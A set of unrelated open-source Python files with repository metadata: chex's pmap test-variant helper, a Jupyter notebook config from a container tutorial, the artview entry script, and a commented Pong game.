@check_variant_arguments
def _with_pmap(fn,
broadcast_args_to_devices=True,
reduce_fn="first_device_output",
n_devices=None,
axis_name="i",
devices=None,
in_axes=0,
static_broadcasted_argnums=(),
static_argnums=(),
backend=None,
**unused_kwargs):
"""Variant that applies `jax.pmap` to fn.
Args:
fn: A function to wrap.
broadcast_args_to_devices: Whether to broadcast `fn` args to pmap format
(i.e. pmapped axes' sizes == a number of devices).
reduce_fn: A function to apply to outputs of `fn`.
n_devices: A number of devices to use (can specify a `backend` if required).
axis_name: An argument for `pmap`.
devices: An argument for `pmap`.
in_axes: An argument for `pmap`.
static_broadcasted_argnums: An argument for `pmap`.
static_argnums: An alias of ``static_broadcasted_argnums``.
backend: An argument for `pmap`.
**unused_kwargs: Unused kwargs (e.g. related to other variants).
Returns:
Wrapped `fn` that accepts `args` and `kwargs` and returns a superposition of
`reduce_fn` and `fn` applied to them.
Raises:
ValueError: If `broadcast_args_to_devices` used with `in_axes` or
`static_broadcasted_argnums`; if number of available devices is less than
required; if pmappable arg axes' sizes are not equal to the number of
devices.
SkipTest: If the flag ``chex_skip_pmap_variant_if_single_device`` is set and
there is only one device available.
"""
if (FLAGS["chex_skip_pmap_variant_if_single_device"].value and
jax.device_count() < 2):
raise unittest.SkipTest(f"Only 1 device is available ({jax.devices()}).")
if broadcast_args_to_devices and in_axes != 0:
raise ValueError(
"Do not use `broadcast_args_to_devices` when specifying `in_axes`.")
# Set up a reduce function.
if reduce_fn == "first_device_output":
reduce_fn = lambda t: tree_map(lambda x: x[0], t)
elif reduce_fn == "identity" or reduce_fn is None: # Identity.
reduce_fn = lambda t: t
if not static_argnums and static_argnums != 0:
static_argnums = static_broadcasted_argnums
if isinstance(static_argnums, int):
static_argnums = (static_argnums,)
pmap_kwargs = dict(
axis_name=axis_name,
devices=devices,
in_axes=in_axes,
static_broadcasted_argnums=static_argnums,
backend=backend)
pmapped_fn = jax.pmap(fn, **pmap_kwargs)
@functools.wraps(pmapped_fn)
def wrapper(*args: pytypes.ArrayTree, **kwargs: pytypes.ArrayTree):
if kwargs and (in_axes != 0 or static_argnums):
raise ValueError("Do not use kwargs with `in_axes` or `static_argnums` "
"in pmapped function.")
devices_ = list(devices or jax.devices(backend))
n_devices_ = n_devices or len(devices_)
devices_ = devices_[:n_devices_]
if len(devices_) != n_devices_:
raise ValueError("Number of available devices is less than required for "
f"test ({len(devices_)} < {n_devices_})")
bcast_fn = lambda x: jnp.broadcast_to(x, (n_devices_,) + jnp.array(x).shape)
if broadcast_args_to_devices:
args = [
tree_map(bcast_fn, arg) if idx not in static_argnums else arg
for idx, arg in enumerate(args)
]
kwargs = tree_map(bcast_fn, kwargs)
else:
# Pmappable axes size must be equal to number of devices.
in_axes_ = in_axes if isinstance(in_axes,
(tuple, list)) else [in_axes] * len(args)
is_pmappable_arg = [
idx not in static_argnums and in_axes_[idx] is not None
for idx in range(len(args))
]
for is_pmappable_arg, arg in zip(is_pmappable_arg, args):
if not is_pmappable_arg:
continue
if not all(
x.shape[0] == n_devices_ for x in jax.tree_util.tree_leaves(arg)):
shapes = tree_map(jnp.shape, arg)
raise ValueError(
f"Pmappable arg axes size must be equal to number of devices, "
f"got: {shapes} (expected the first dim to be {n_devices_}). "
"Consider setting `broadcast_args_to_devices=True`.")
new_kwargs = dict(
axis_name=axis_name,
devices=devices_,
in_axes=in_axes,
static_broadcasted_argnums=static_argnums,
backend=backend)
# Re-compile fn if kwargs changed.
nonlocal pmap_kwargs
nonlocal pmapped_fn
if new_kwargs != pmap_kwargs:
pmap_kwargs = new_kwargs
pmapped_fn = jax.pmap(fn, **pmap_kwargs)
res = pmapped_fn(*args, **kwargs)
return reduce_fn(res)
return wrapper
_variant_decorators = dict({
ChexVariantType.WITH_JIT: _with_jit,
ChexVariantType.WITHOUT_JIT: _without_jit,
ChexVariantType.WITH_DEVICE: _with_device,
ChexVariantType.WITHOUT_DEVICE: _without_device,
ChexVariantType.WITH_PMAP: _with_pmap,
})
class Variant:
"""Variant class for typing and string representation."""
def __init__(self, name, fn):
self._fn = fn
self._name = name
def __repr__(self):
return self._name
def __call__(self, *args, **kwargs):
# Could apply decorators (currying, arg-checking) here
return self._fn(*args, **kwargs)
# Expose variant objects.
without_device = Variant("chex_without_device", _without_device)
without_jit = Variant("chex_without_jit", _without_jit)
with_device = Variant("chex_with_device", _with_device)
with_jit = Variant("chex_with_jit", _with_jit)
with_pmap = Variant("chex_with_pmap", _with_pmap)
ALL_VARIANTS = (without_device, without_jit, with_device, with_jit, with_pmap)
# Collect valid argument names from all variant decorators.
_valid_kwargs_keys = set()
for fn_ in _variant_decorators.values():
original_fn = fn_.func.__wrapped__
_valid_kwargs_keys.update(inspect.getfullargspec(original_fn).args)
|
{
"content_hash": "d4b9aa6288ec3af62cd17a8cb3016a89",
"timestamp": "",
"source": "github",
"line_count": 596,
"max_line_length": 80,
"avg_line_length": 33.14093959731544,
"alnum_prop": 0.6479343863912516,
"repo_name": "deepmind/chex",
"id": "f067ebbb3504589a8743157ba88393f2ff52de76",
"size": "20448",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "chex/_src/variants.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "295381"
},
{
"name": "Shell",
"bytes": "2675"
}
],
"symlink_target": ""
}
|
c.NotebookApp.ip = '0.0.0.0'
## Supply extra arguments that will be passed to Jinja environment.
#c.NotebookApp.jinja_environment_options = {}
## Extra variables to supply to jinja templates when rendering.
#c.NotebookApp.jinja_template_vars = {}
## The kernel manager class to use.
#c.NotebookApp.kernel_manager_class = 'notebook.services.kernels.kernelmanager.MappingKernelManager'
## The kernel spec manager class to use. Should be a subclass of
# `jupyter_client.kernelspec.KernelSpecManager`.
#
# The Api of KernelSpecManager is provisional and might change without warning
# between this version of Jupyter and the next stable one.
#c.NotebookApp.kernel_spec_manager_class = 'jupyter_client.kernelspec.KernelSpecManager'
## The full path to a private key file for usage with SSL/TLS.
#c.NotebookApp.keyfile = ''
## The login handler class to use.
#c.NotebookApp.login_handler_class = 'notebook.auth.login.LoginHandler'
## The logout handler class to use.
#c.NotebookApp.logout_handler_class = 'notebook.auth.logout.LogoutHandler'
## The MathJax.js configuration file that is to be used.
#c.NotebookApp.mathjax_config = 'TeX-AMS-MML_HTMLorMML-full,Safe'
## A custom url for MathJax.js. Should be in the form of a case-sensitive url to
# MathJax, for example: /static/components/MathJax/MathJax.js
#c.NotebookApp.mathjax_url = ''
## Dict of Python modules to load as notebook server extensions.Entry values can
# be used to enable and disable the loading ofthe extensions. The extensions
# will be loaded in alphabetical order.
#c.NotebookApp.nbserver_extensions = {}
## The directory to use for notebooks and kernels.
#c.NotebookApp.notebook_dir = ''
## Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library `webbrowser`
# module, unless it is overridden using the --browser (NotebookApp.browser)
# configuration option.
#c.NotebookApp.open_browser = True
## Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from notebook.auth import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
## Forces users to use a password for the Notebook server. This is useful in a
# multi user environment, for instance when everybody in the LAN can access each
# other's machine though ssh.
#
# In such a case, server the notebook server on localhost is not secure since
# any user can connect to the notebook server via ssh.
c.NotebookApp.password_required = True
#
# Look for password in environment. This is the user's plaintext password. Not for prod use
import os
if os.environ.get('AGAVE_PASSWORD'):
#
# hash the plaintext password here
from notebook.auth import passwd
agavePassHash = passwd(os.environ.get('AGAVE_PASSWORD'))
c.NotebookApp.password = agavePassHash
elif os.environ.get('AGAVE_PASSWORD_HASH'):
agavePassHash = os.environ.get('AGAVE_PASSWORD_HASH');
c.NotebookApp.password = agavePassHash
#
# # No password in the env, so look for an agave username to look up the docker secret
# elif os.environ.get('AGAVE_USERNAME'):
#
# # secret will be filed under the training/<username>/hash path
# secretFilePath = print "/run/secrets/training/{}/hash" os.environ.get('AGAVE_USERNAME');
#
# # if it exists, read the contents and use that
# if os.path.isfile(secretFilePath):
#
# f = open(secretFilePath,'r',encoding = 'utf-8')
# agavePassHash = f.read()
#
# # If the value is not empty use that
# if agavePassHash:
# c.NotebookApp.password = agavePassHash
#
# # otherwise do not require password
# else:
# c.NotebookApp.password_required = False
#
# # no secret file and no password or hash in environment.
# # we won't require password as we have none to use
# else
# c.NotebookApp.password_required = False
#
# # no username and no password or hash in environment.
# # we won't require password as we have none to use
else:
c.NotebookApp.password_required = False
## The port the notebook server will listen on.
c.NotebookApp.port = 8888
## The number of additional ports to try if the specified port is not available.
#c.NotebookApp.port_retries = 50
## DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
#c.NotebookApp.pylab = 'disabled'
## (sec) Time window used to check the message and data rate limits.
#c.NotebookApp.rate_limit_window = 3
## Reraise exceptions encountered loading server extensions?
#c.NotebookApp.reraise_server_extension_failures = False
## DEPRECATED use the nbserver_extensions dict instead
#c.NotebookApp.server_extensions = []
## The session manager class to use.
#c.NotebookApp.session_manager_class = 'notebook.services.sessions.sessionmanager.SessionManager'
## Supply SSL options for the tornado HTTPServer. See the tornado docs for
# details.
#c.NotebookApp.ssl_options = {}
## Supply overrides for terminado. Currently only supports "shell_command".
#c.NotebookApp.terminado_settings = {}
## Token used for authenticating first-time connections to the server.
#
# When no password is enabled, the default is to generate a new, random token.
#
# Setting to an empty string disables authentication altogether, which is NOT
# RECOMMENDED.
#c.NotebookApp.token = '<generated>'
## Supply overrides for the tornado.web.Application that the Jupyter notebook
# uses.
#c.NotebookApp.tornado_settings = {}
## Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headerssent by the upstream reverse proxy. Necessary if the proxy handles
# SSL
#c.NotebookApp.trust_xheaders = False
## DEPRECATED, use tornado_settings
#c.NotebookApp.webapp_settings = {}
## The base URL for websockets, if it differs from the HTTP server (hint: it
# almost certainly doesn't).
#
# Should be in the form of an HTTP origin: ws[s]://hostname[:port]
#c.NotebookApp.websocket_url = ''
#------------------------------------------------------------------------------
# ConnectionFileMixin(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## Mixin for configurable classes that work with connection files
## JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
#c.ConnectionFileMixin.connection_file = ''
## set the control (ROUTER) port [default: random]
#c.ConnectionFileMixin.control_port = 0
## set the heartbeat port [default: random]
#c.ConnectionFileMixin.hb_port = 0
## set the iopub (PUB) port [default: random]
#c.ConnectionFileMixin.iopub_port = 0
## Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
#c.ConnectionFileMixin.ip = ''
## set the shell (ROUTER) port [default: random]
#c.ConnectionFileMixin.shell_port = 0
## set the stdin (ROUTER) port [default: random]
#c.ConnectionFileMixin.stdin_port = 0
##
#c.ConnectionFileMixin.transport = 'tcp'
#------------------------------------------------------------------------------
# KernelManager(ConnectionFileMixin) configuration
#------------------------------------------------------------------------------
## Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
## Should we autorestart the kernel if it dies.
#c.KernelManager.autorestart = True
## DEPRECATED: Use kernel_name instead.
#
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a configuration file, Jupyter does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it given on the Jupyter command
# line.
#c.KernelManager.kernel_cmd = []
## Time to wait for a kernel to terminate before killing it, in seconds.
#c.KernelManager.shutdown_wait_time = 5.0
#------------------------------------------------------------------------------
# Session(Configurable) configuration
#------------------------------------------------------------------------------
## Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, `key` will be initialized
# to the contents of the file.
## Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
#c.Session.buffer_threshold = 1024
## Whether to check PID to protect against calls after fork.
#
# This check can be disabled if fork-safety is handled elsewhere.
#c.Session.check_pid = True
## Threshold (in bytes) beyond which a buffer should be sent without copying.
#c.Session.copy_threshold = 65536
## Debug output in the Session
#c.Session.debug = False
## The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
#c.Session.digest_history_size = 65536
## The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
#c.Session.item_threshold = 64
## execution key, for signing messages.
#c.Session.key = b''
## path to file containing execution key.
#c.Session.keyfile = ''
## Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
#c.Session.metadata = {}
## The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
#c.Session.packer = 'json'
## The UUID identifying this session.
#c.Session.session = ''
## The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
#c.Session.signature_scheme = 'hmac-sha256'
## The name of the unpacker for unserializing messages. Only used with custom
# functions for `packer`.
#c.Session.unpacker = 'json'
## Username for the Session. Default is your system username.
#c.Session.username = 'jovyan'
#------------------------------------------------------------------------------
# MultiKernelManager(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## A class for managing multiple kernels.
## The name of the default kernel to start
#c.MultiKernelManager.default_kernel_name = 'python3'
## The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
#c.MultiKernelManager.kernel_manager_class = 'jupyter_client.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# MappingKernelManager(MultiKernelManager) configuration
#------------------------------------------------------------------------------
## A KernelManager that handles notebook mapping and HTTP error handling
##
#c.MappingKernelManager.root_dir = ''
#------------------------------------------------------------------------------
# ContentsManager(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## Base class for serving files and directories.
#
# This serves any text or binary file, as well as directories, with special
# handling for JSON notebook documents.
#
# Most APIs take a path argument, which is always an API-style unicode path, and
# always refers to a directory.
#
# - unicode, not url-escaped
# - '/'-separated
# - leading and trailing '/' will be stripped
# - if unspecified, path defaults to '',
# indicating the root path.
##
#c.ContentsManager.checkpoints = None
##
#c.ContentsManager.checkpoints_class = 'notebook.services.contents.checkpoints.Checkpoints'
##
#c.ContentsManager.checkpoints_kwargs = {}
## Glob patterns to hide in file and directory listings.
#c.ContentsManager.hide_globs = ['__pycache__', '*.pyc', '*.pyo', '.DS_Store', '*.so', '*.dylib', '*~']
## Python callable or importstring thereof
#
# To be called on a contents model prior to save.
#
# This can be used to process the structure, such as removing notebook outputs
# or other side effects that should not be saved.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(path=path, model=model, contents_manager=self)
#
# - model: the model to be saved. Includes file contents.
# Modifying this dict will affect the file that is stored.
# - path: the API path of the save destination
# - contents_manager: this ContentsManager instance
#c.ContentsManager.pre_save_hook = None
##
#c.ContentsManager.root_dir = '/'
## The base name used when creating untitled directories.
#c.ContentsManager.untitled_directory = 'Untitled Folder'
## The base name used when creating untitled files.
#c.ContentsManager.untitled_file = 'untitled'
## The base name used when creating untitled notebooks.
#c.ContentsManager.untitled_notebook = 'Untitled'
#------------------------------------------------------------------------------
# FileManagerMixin(Configurable) configuration
#------------------------------------------------------------------------------
## Mixin for ContentsAPI classes that interact with the filesystem.
#
# Provides facilities for reading, writing, and copying both notebooks and
# generic files.
#
# Shared by FileContentsManager and FileCheckpoints.
#
# Note ---- Classes using this mixin must provide the following attributes:
#
# root_dir : unicode
# A directory against against which API-style paths are to be resolved.
#
# log : logging.Logger
## By default notebooks are saved on disk on a temporary file and then if
# succefully written, it replaces the old ones. This procedure, namely
# 'atomic_writing', causes some bugs on file system whitout operation order
# enforcement (like some networked fs). If set to False, the new notebook is
# written directly on the old one which could fail (eg: full filesystem or quota
# )
#c.FileManagerMixin.use_atomic_writing = True
#------------------------------------------------------------------------------
# FileContentsManager(FileManagerMixin,ContentsManager) configuration
#------------------------------------------------------------------------------
## Python callable or importstring thereof
#
# to be called on the path of a file just saved.
#
# This can be used to process the file on disk, such as converting the notebook
# to a script or HTML via nbconvert.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(os_path=os_path, model=model, contents_manager=instance)
#
# - path: the filesystem path to the file just written - model: the model
# representing the file - contents_manager: this ContentsManager instance
#c.FileContentsManager.post_save_hook = None
##
#c.FileContentsManager.root_dir = ''
## DEPRECATED, use post_save_hook. Will be removed in Notebook 5.0
#c.FileContentsManager.save_script = False
#------------------------------------------------------------------------------
# NotebookNotary(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## A class for computing and verifying notebook signatures.
## The hashing algorithm used to sign notebooks.
#c.NotebookNotary.algorithm = 'sha256'
## The sqlite file in which to store notebook signatures. By default, this will
# be in your Jupyter data directory. You can set it to ':memory:' to disable
# sqlite writing to the filesystem.
#c.NotebookNotary.db_file = ''
## The secret key with which notebooks are signed.
#c.NotebookNotary.secret = b''
## The file where the secret key is stored.
#c.NotebookNotary.secret_file = ''
## A callable returning the storage backend for notebook signatures. The default
# uses an SQLite database.
#c.NotebookNotary.store_factory = traitlets.Undefined
#------------------------------------------------------------------------------
# KernelSpecManager(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## If there is no Python kernelspec registered and the IPython kernel is
# available, ensure it is added to the spec list.
#c.KernelSpecManager.ensure_native_kernel = True
## The kernel spec class. This is configurable to allow subclassing of the
# KernelSpecManager for customized behavior.
#c.KernelSpecManager.kernel_spec_class = 'jupyter_client.kernelspec.KernelSpec'
## Whitelist of allowed kernel names.
#
# By default, all installed kernels are allowed.
#c.KernelSpecManager.whitelist = set()
|
{
"content_hash": "f4afb663cd11451a410c7f921e3ee878",
"timestamp": "",
"source": "github",
"line_count": 491,
"max_line_length": 103,
"avg_line_length": 37.686354378818734,
"alnum_prop": 0.6754215304798963,
"repo_name": "agaveapi/SC17-container-tutorial",
"id": "158467a8aae395339c76326c9fd18efff66a46a4",
"size": "24124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "content/images/jupyter/jupyter_notebook_config.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "346832"
},
{
"name": "Jupyter Notebook",
"bytes": "716110"
},
{
"name": "Python",
"bytes": "26601"
},
{
"name": "Shell",
"bytes": "8830"
}
],
"symlink_target": ""
}
|
import sys
import os
path = os.path.dirname(sys.modules[__name__].__file__)
path = os.path.join(path, '..')
sys.path.insert(0, path)
import artview
def main(argv):
script, DirIn, filename, field = artview.parser.parse(argv)
if script:
artview.scripts.scripts[script](DirIn, filename, field)
else:
artview.run(DirIn, filename, field)
if __name__ == "__main__":
main(sys.argv)
|
{
"content_hash": "b6579cd5b687e60cb5fe2c2a30a89a68",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 63,
"avg_line_length": 20.65,
"alnum_prop": 0.639225181598063,
"repo_name": "jjhelmus/artview",
"id": "ba5523b60e8767eea1e8a3697d330b8bed5a5148",
"size": "463",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "artview/__main__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "447864"
}
],
"symlink_target": ""
}
|
import simplegui
# Import module, which contains functions that involve
# randomness.
import random
#---------------------------------------------------------
# Define and initialize global constants.
# Initialize global constants that will hold the "width"
# and "height" of the "canvas" ("Pong" table).
WIDTH = 600
HEIGHT = 400
# Initialize global constant that will hold the "radius"
# of the ball.
BALL_RADIUS = 20
# Initialize global constants that will hold the "width"
# and "height" of the "paddles".
PAD_WIDTH = 8
PAD_HEIGHT = 80
# as well as compute the "half" of those values.
HALF_PAD_WIDTH = PAD_WIDTH / 2
HALF_PAD_HEIGHT = PAD_HEIGHT / 2
# Initialize global constants that will determine the
# (horizontal) "direction" of the ball at the beginning
# of a new game.
LEFT = False
RIGHT = True
# Initialize global constants that will hold the "beginning"
# and the "end" limits of "speed" ranges concerning the
# horizontal and vertical "velocities", which will be
# generated as random numbers within those boundaries
# (pixels per update; 1/60 seconds) and according to the
# guidelines of this project.
BALL_VEL_x_RANGE_START = 120
BALL_VEL_x_RANGE_STOP = 240
BALL_VEL_y_RANGE_START = 60
BALL_VEL_y_RANGE_STOP = 180
# Initialize global constant that will hold the "acceleration"
# of the (horizontal) ball "velocity".
# Increase the difficulty of the game, by increasing the
# "velocity" of the ball by 10% each time it strikes a
# "paddle".
BALL_VELOCITY_ACCELERATION = 1.1
# "Gutter" points.
# Whenever ball touches "gutter", "Player" gets "points".
POINTS = 1
# In this version of "Pong", the left and right "paddles"
# move up and down respectively at a constant "velocity".
VERTICAL_VELOCITY = 4
# Motion keys.
# If the "w" or "s" key is pressed, move up or down left
# "paddle". If the "up arrow" or "down arrow" key is
# pressed, move up or down right "paddle".
MOTION_KEYS = ["w", "s", "up", "down"]
# Each new game should start after these seconds from the
# time the "frame" opens or the time the "previous" game
# ends.
NEW_GAME_DELAY = 3
# Set general "draw" properties.
COLOR = 'White'
FONT_FACE = 'sans-serif'
FONT_SIZE = 50
LINE_WIDTH = 1
#---------------------------------------------------------
# Define and initialize global variables.
# Initialize global variable that will hold the horizontal
# and vertical "position" as well as "velocity" for the
# ball. Note: "velocity" = pixels per update; 1/60 seconds).
ball_pos = [WIDTH / 2, HEIGHT / 2]
ball_vel = [random.randrange(BALL_VEL_x_RANGE_START, BALL_VEL_x_RANGE_STOP) // 60,
random.randrange(BALL_VEL_y_RANGE_START, BALL_VEL_y_RANGE_STOP) // 60]
# Initialize global variables that will hold the vertical
# "positions" of the two "paddles", i.e. the vertical
# distance of the left and right "paddles" (centre of the
# "paddles") from the top of the "canvas" (table).
paddle1_pos = HEIGHT / 2
paddle2_pos = paddle1_pos
# Initialize global variables that will hold the vertical
# "velocities" of the "paddles".
paddle1_vel = 0
paddle2_vel = 0
# Initialize global variables that will hold the scores
# for each "Player".
score1 = 0
score2 = 0
# Initialize global variable that will keep
# track of the time in "seconds".
seconds = 0
#---------------------------------------------------------
def spawn_ball(direction):
"""
Initialize ball "position" and "velocity" for new ball
in the middle of the table. If "direction" is "RIGHT",
the ball's "velocity" is upper right, else upper left.
"""
# These are vectors stored as (global) "[x,y]" lists;
# ball "position" and "velocity".
global ball_pos, ball_vel
# Set ball "position" at the middle of the table.
ball_pos = [WIDTH / 2, HEIGHT / 2]
# Randomization to the "velocity". The exact values for
# the horizontal and vertical components of this
# "velocity" should be generated using "random.randrange()".
# This function returns a random integer "n" such that
# "start <= n < stop". For the horizontal and vertical
# "velocities", we generate a random number within the
# suggested "speed" limits (pixels per update;
# 1/60 seconds).
ball_vel[0] = random.randrange(BALL_VEL_x_RANGE_START, BALL_VEL_x_RANGE_STOP) // 60
ball_vel[1] = random.randrange(BALL_VEL_y_RANGE_START, BALL_VEL_y_RANGE_STOP) // 60
# The velocity of the ball should be upwards and towards
# the right.
if direction == RIGHT:
ball_vel = [ball_vel[0], -ball_vel[1]]
# The velocity of the ball should be upwards and towards
# the left.
else:
ball_vel = [-ball_vel[0], -ball_vel[1]]
return None
#---------------------------------------------------------
def new_game():
"""
Initialize a new game by reseting the vertical "positions"
and "velocities" of the "paddles" as well as the "score"
of each "Player". Call "spawn_ball()" to initialize
"position" and "velocity" for new ball. Start also a
timer, which will "postpone" the beginning of a new
game by the configured ammount of time.
"""
# These are (global) numbers; vertical "position" of
# each "paddle".
global paddle1_pos, paddle2_pos
# These are (global) numbers; vertical "velocity" of
# each "paddle".
global paddle1_vel, paddle2_vel
# These are (global) numbers; "score" of each
# "Player".
global score1, score2
# Reset vertical positions of the two "paddles"
# (as global variables).
paddle1_pos = HEIGHT / 2
paddle2_pos = paddle1_pos
# Reset vertical "velocities" of the two "paddles"
# (as global variables).
paddle1_vel = 0
paddle2_vel = 0
# Reset "Player" scores (as global variables).
score1 = 0
score2 = 0
# Check if "Timer" is Running; if not, start the "Timer".
if not timer.is_running():
timer.start()
# Start a game of "Pong".
spawn_ball(RIGHT)
return None
#---------------------------------------------------------
def draw_handler(canvas):
"""
Event handler that is responsible for all drawing. It
receives "canvas" object and draws the "Pong" table,
the "moving" ball and the scores of each "Player".
It is also responsible for testing whether the ball
touches/collides with the "gutters" or the "paddles".
"""
# These are (global) numbers; vertical "position" of
# each "paddle".
global paddle1_pos, paddle2_pos
# These are (global) numbers; "score" of each "Player".
global score1, score2
# These are vectors stored as (global) "[x,y]" lists;
# ball "position" and "velocity".
global ball_pos, ball_vel
# This is (global) number; keeps track of the time in
# "seconds".
global seconds
# Draw middle line and "gutters" of "Pong" table.
canvas.draw_line([WIDTH / 2, 0], [WIDTH / 2, HEIGHT], LINE_WIDTH, COLOR)
canvas.draw_line([PAD_WIDTH, 0], [PAD_WIDTH, HEIGHT], LINE_WIDTH, COLOR)
canvas.draw_line([WIDTH - PAD_WIDTH, 0], [WIDTH - PAD_WIDTH, HEIGHT], LINE_WIDTH, COLOR)
# "Postpone" the beginning of new game if "Timer" is
# already running by "reseting" ball "position" at the
# middle of the table.
if timer.is_running():
ball_pos = [WIDTH / 2, HEIGHT / 2]
# Print message about the remaining time until the
# beginning of the new game by referencing the
# global "seconds" counter.
canvas.draw_text("new game will start in " +
str(NEW_GAME_DELAY - seconds) +
" seconds" +
("." * (NEW_GAME_DELAY - seconds)),
[WIDTH // 12, 3 * HEIGHT // 4], 3 * FONT_SIZE // 10, COLOR, FONT_FACE)
else:
# "Timer" has expired; update ball "position" for
# the new game.
ball_pos[0] += ball_vel[0]
ball_pos[1] += ball_vel[1]
# Test whether the ball touches/collides with the left
# "gutter" (offset from the left edge of the "canvas"
# by the width of the "paddle").
if ball_pos[0] <= (BALL_RADIUS + PAD_WIDTH):
# Check whether the ball is actually striking left
# "paddle" when it touches left "gutter". If so,
# reflect the ball back into play; ball's "velocity"
# increased by the "acceleration" configured.
if ((paddle1_pos - HALF_PAD_HEIGHT) <= ball_pos[1] <= (paddle1_pos + HALF_PAD_HEIGHT)):
ball_vel[0] = -ball_vel[0] * BALL_VELOCITY_ACCELERATION
else:
# Ball touched "gutter". Respawn the ball in
# the center of the table headed towards the
# opposite "gutter" and of course update score
# of "Player" 2 (right) by the "points"
# configured.
score2 += POINTS
# Start a game of "Pong". Start also a "Timer"
# to "postpone" the beginning of the new game.
if not timer.is_running():
timer.start()
spawn_ball(RIGHT)
# Test whether the ball touches/collides with the right
# "gutter" (offset from the right edge of the "canvas"
# by the width of the "paddle").
elif ball_pos[0] >= ((WIDTH - 1) - BALL_RADIUS - PAD_WIDTH):
# Check whether the ball is actually striking right
# "paddle" when it touches right "gutter". If so,
# reflect the ball back into play; ball's "velocity"
# increased by the "acceleration" configured.
if ((paddle2_pos - HALF_PAD_HEIGHT) <= ball_pos[1] <= (paddle2_pos + HALF_PAD_HEIGHT)):
ball_vel[0] = -ball_vel[0] * BALL_VELOCITY_ACCELERATION
else:
# Ball touched "gutter". Respawn the ball in
# the center of the table headed towards the
# opposite "gutter" and of course update score
# of "Player" 1 (left) by the "points"
# configured.
score1 += POINTS
# Start a game of "Pong". Start also a "Timer"
# to "postpone" the beginning of the new game.
if not timer.is_running():
timer.start()
spawn_ball(LEFT)
# Collide and reflect off of top side of the "canvas".
elif ball_pos[1] <= BALL_RADIUS:
ball_vel[1] = -ball_vel[1]
# Collide and reflect off of bottom side of the "canvas".
elif ball_pos[1] >= ((HEIGHT - 1) - BALL_RADIUS):
ball_vel[1] = -ball_vel[1]
# Draw a ball moving across the "Pong" table.
canvas.draw_circle(ball_pos, BALL_RADIUS, 2 * LINE_WIDTH, COLOR, COLOR)
# Update paddle's vertical "position", by
# referencing the two global variables that contain the
# vertical "velocities" of the "paddle". Keep "paddle"
# on the screen by calling the proper "helper" function.
if keep_paddle_on_screen(paddle1_pos, paddle1_vel):
paddle1_pos += paddle1_vel
if keep_paddle_on_screen(paddle2_pos, paddle2_vel):
paddle2_pos += paddle2_vel
# Draw left and right "paddles" in their respective
# "gutters".
canvas.draw_polygon([[0, paddle1_pos - HALF_PAD_HEIGHT],
[PAD_WIDTH, paddle1_pos - HALF_PAD_HEIGHT],
[PAD_WIDTH, paddle1_pos + HALF_PAD_HEIGHT],
[0, paddle1_pos + HALF_PAD_HEIGHT]],
LINE_WIDTH, COLOR, COLOR)
canvas.draw_polygon([[WIDTH - PAD_WIDTH, paddle2_pos - HALF_PAD_HEIGHT],
[WIDTH , paddle2_pos - HALF_PAD_HEIGHT],
[WIDTH, paddle2_pos + HALF_PAD_HEIGHT],
[WIDTH - PAD_WIDTH, paddle2_pos + HALF_PAD_HEIGHT]],
LINE_WIDTH, COLOR, COLOR)
# Draw scores;
# but first get the width of the "score" text in pixels
# for each "Player"; useful in (later) computing the
# position to draw the "score" text - centered justified
# on the "canvas field" of each player.
score_textwidth_in_px = frame.get_canvas_textwidth(str(score1), FONT_SIZE, FONT_FACE)
